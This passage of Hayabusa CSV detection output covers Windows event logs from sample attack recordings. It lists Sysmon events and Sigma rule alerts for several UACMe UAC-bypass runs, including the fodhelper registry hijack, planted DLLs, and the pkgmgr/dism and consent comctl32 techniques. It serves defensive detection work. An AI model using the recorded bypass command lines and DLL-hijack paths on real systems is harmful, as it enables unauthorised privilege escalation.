Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:07.652 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.681 
+09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:08.799 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,File 
Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 
0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: 
consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.666 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.803 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,Evas | 
PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 
2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart 
/apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx 2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 
747F3D96-7930-5D45-0000-001027DC0601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 2019-08-03 21:08:19.888 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: 
